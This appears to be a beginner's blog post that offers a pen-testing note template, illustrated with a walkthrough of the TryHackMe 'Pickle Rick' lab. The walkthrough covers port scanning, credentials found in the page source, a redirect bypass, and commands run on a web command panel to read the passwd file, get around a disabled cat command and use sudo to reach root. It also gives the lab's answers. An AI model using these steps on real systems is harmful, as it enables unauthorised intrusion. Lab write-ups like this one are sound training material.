Pen-testing Notes Template

Image for post
Image for post

There is a lot going on when pen-testing a box. Bits of information that may seem irrelevant can become valuable “cookie crumbs” on the long trail to obtaining root. Your journey doesn’t end there. Then comes the fun part…documentation!

Below is a simple breakdown of how I note take and keep track of progress during pen-testing. Remember, everyone has their own style. The right answer is however you personally root the box. Challenge yourself and watch numerous tutorials on how others achieved the same goal. Use the differences in approaches to learn a new technique, add a line to your thought process or harden your own defenses so it doesn’t happen to you.

There is by no means a be all end all solution. While tackling boxes I keep track of all my documentation in a simple .txt file. This file will contain all commands, outputs, code and thoughts (even the dumb ones) I have during the process. It can become quite lengthy but when you need to step away for a bit (Which I do a lot) the walk-through guide is a life saver. Not to mention you are doing all the heavy lifting for your documentation in real-time. Thus, giving you a master file to reference at the finish line.

There are general tools and procedures you will use on almost every box. I have included the 4 initial steps I take on almost every box. Each section is filled out with outputs, notes, findings, etc. Enter additional steps as needed. Recording your screen/actions is also invaluable when it comes to writing and reviewing your work for documentation.

Have a suggestion for something to add to my template? Let me know! :)

Let us begin!

Client/Box================================

  • Title of Box
  • IP Address: <Address_Here>

Flags/Questions/What Are We Attempting To Find===========

  1. Flag #1
  2. Flag #2
  3. Flag #3

What Do We Know============================

  1. Crumb_1
  2. Crumb_2
  3. Crumb_3

Walk-Through/Step By Step Guide=================== Step 1: Visit IP Address In Browser With Burp Suite Running (Mapping)

<Content_Here>

======================================= Step 2: Nmap IP Address

<Content_Here>

======================================= Step 3: Check robot.txt

<Content_Here>

======================================= Step 4: Directory Discovery (Gobuster or DirBuster)

<Content_Here>

======================================= Step 5: Next Step

<Content_Here>

=======================================

Below is an example of what the template could end up looking like. This example was created from the TryHackMe — Pickle Rick box. https://www.tryhackme.com/room/picklerick

Client/Box================================

  • TryHackMe Pickle_Rick Box
  • IP Address: 10.10.203.236

Flags/Questions/What Are We Attempting To Find===========

  1. ) What is the first ingredient Rick needs?
  • Mr. Meeseek Hair

2.) What is the second ingredient RIck needs?

  • 1 Jerry Tear

3.) What is the final ingredient Rick needs?

  • Fleeb Juice

What Do we Know===========================

1.) Credentials: R1ckRul3s: Wubbalubbadubdub (password originally unknown)

2.) URL_Path = /assets

3.) Port 22: SSH — OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)

4.) Port 80: TCP — Apache httpd 2.4.18 ((Ubuntu))

5.) http-title: Rick is sup4r cool

6.) Wubbalubbadubdub exists <=This was Rick’s catchphrase in season 1

7.) Manual GET Header change to avoid re-direct GET /login.php => http://10.10.203.236/portal.php <=This matches the portal.gif because the URL is /portal.php

8.) Used Command tab to get first ingredient = mr. meeseek hair

9.) Used command tab to get clue on second ingredient = “Look around file system”

10.) Found file: /home/rick/”second ingredients” => less /home/rick/”second ingredients” => 1 jerry tear

11.) Determined we have root access => sudo /root/3rd.txt

Walk-Through/Step By Step Guide====================

Step 1: F12 to view web source

<!DOCTYPE html>
<html lang=”en”>
<head>
<title>Rick is sup4r cool</title>
<meta charset=”utf-8">
<meta name=”viewport” content=”width=device-width, initial-scale=1">
<link rel=”stylesheet” href=”assets/bootstrap.min.css”>
<script src=”assets/jquery.min.js”></script>
<script src=”assets/bootstrap.min.js”></script>
<style>
.jumbotron {
background-image: url(“assets/rickandmorty.jpeg”);
background-size: cover;
height: 340px;
}
</style>
</head>
<body>

<div class=”container”>
<div class=”jumbotron”></div>
<h1>Help Morty!</h1></br>
<p>Listen Morty… I need your help, I’ve turned myself into a pickle again and this time I can’t change back!</p></br>
<p>I need you to <b>*BURRRP*</b>….Morty, logon to my computer and find the last three secret ingredients to finish my pickle-reverse potion. The only problem is,
I have no idea what the <b>*BURRRRRRRRP*</b>, password was! Help Morty, Help!</p></br>
</div>

<! —

Note to self, remember username!

Username: R1ckRul3s

</body>
</html>

=======================================

Step 2: Nmap IP Address

Nmap scan report for 10.10.203.236
Host is up (0.22s latency).
Not shown: 65533 closed ports

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 67:2c:3d:e7:ee:3b:de:90:43:81:04:df:ff:d4:7b:47 (RSA)
| 256 1a:a2:b6:30:5e:ef:45:d6:35:32:31:de:1b:01:32:3e (ECDSA)
|_ 256 00:7d:0b:1d:f5:fd:bc:86:f3:62:9c:fb:85:74:f1:04 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: POST OPTIONS GET HEAD
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Rick is sup4r cool

No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).

TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=12/22%OT=22%CT=1%CU=43257%PV=Y%DS=4%DC=T%G=Y%TM=5FE28B
OS:75%P=x86_64-pc-linux-gnu)SEQ(SP=108%GCD=1%ISR=10D%TI=Z%CI=I%II=I%TS=8)OP
OS:S(O1=M506ST11NW7%O2=M506ST11NW7%O3=M506NNT11NW7%O4=M506ST11NW7%O5=M506ST
OS:11NW7%O6=M506ST11)WIN(W1=68DF%W2=68DF%W3=68DF%W4=68DF%W5=68DF%W6=68DF)EC
OS:N(R=Y%DF=Y%T=40%W=6903%O=M506NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=
OS:AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(
OS:R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%
OS:F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N
OS:%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%C
OS:D=S)

=======================================

Step 3: Visit http://10.10.203.236/assets/

Index of /assets
[ICO] Name Last modified Size Description
[PARENTDIR] Parent Directory —
[TXT] bootstrap.min.css 2019–02–10 16:37 119K
[ ] bootstrap.min.js 2019–02–10 16:37 37K
[IMG] fail.gif 2019–02–10 16:37 49K
[ ] jquery.min.js 2019–02–10 16:37 85K
[IMG] picklerick.gif 2019–02–10 16:37 222K
[IMG] portal.jpg 2019–02–10 16:37 50K
[IMG] rickandmorty.jpeg 2019–02–10 16:37 488K

Apache/2.4.18 (Ubuntu) Server at 10.10.203.236 Port 80

=======================================

Step 4: See if there is a robot.txt file

http://10.10.203.236/robots.txt <=== Page exists

Wubbalubbadubdub

  • Googling the phrase tells us this is Rick’s favorite catchphrase in season 1

=======================================

Step 5: Hit Dead End

Go back and review what do we know and what are current tools showing us
1.) Website itself
2.) Burp Suite -Review each request response — Something needs to stand out
3.) Nmap

*Currently running Gobuster

=======================================

Step 6: Burp Suite — 301 moved response

  • Burp Proxy is telling us that our request is being re-directed
  • Googled if we can stop the request before hitting the re-direct
  • Saw an example of someone modifying the GET header to go to login.php
  • When I make this edit we got a HTTP 200 response and it leads us to a login page

Attempted to use the following to login
-Username = R1ckRul3s
-Password = Wubbalubbadubdub

Login Successful

  • The “portal”.jpg had me interested because a login is also referred to a portal
  • Rick and Morty use portals to get to places so I knew there is something to do with that
  • The URL for the login page is “/portal.php”

Since I got the login before gobuster returned anything I have canceled gobuster for now.

=======================================

Step 7: http://10.10.203.236/portal.php “Commands” Tab

-All other tabs send us to “/denied.php”.
-It says only the “REAL” Rick can access these pages.
-Most likely means we need to get root privleges to access them

-I believe we need to use the command tab to enter terminal commands to get the information we need

Attempted commands:
1.) whoami = www.data

2.) ls
Sup3rS3cretPickl3Ingred.txt
assets
clue.txt
denied.php
index.html
login.php
portal.php
robots.txt

3.) pwd
/var/www/html

4.) getent passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
messagebus:x:107:111::/var/run/dbus:/bin/false
uuidd:x:108:112::/run/uuidd:/bin/false
dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false
sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin
pollinate:x:111:1::/var/cache/pollinate:/bin/false
ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash

5.)cat Sup3rS3cretPickl3Ingred.txt
Command disabled to make it hard for future PICKLEEEE RICCCKKKK.

6.) cat clue.txt
Command disabled to make it hard for future PICKLEEEE RICCCKKKK.

****Attempt to use a command other than CAT but stil allows you to read a file

7.) less clue.txt
Look around the file system for the other ingredient.

8.) less Sup3rS3cretPickl3Ingred.txt
mr. meeseek hair

9.) find / | grep rick
/home/rick/second ingredients

10.) less /home/rick/”second ingredients” (remember paths with spaces need quotes)
1 jerry tear

11.) Check what permissions we have

sudo -l

we have root permissions.

12.) There is a /root directory. Use sudo to get in it.

sudo /root/3rd.txt

contains the last ingredient

Written by

Starting my journey into Cybersecurity. Documenting walk-through guides to practice documentation and learn a thing or two.

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store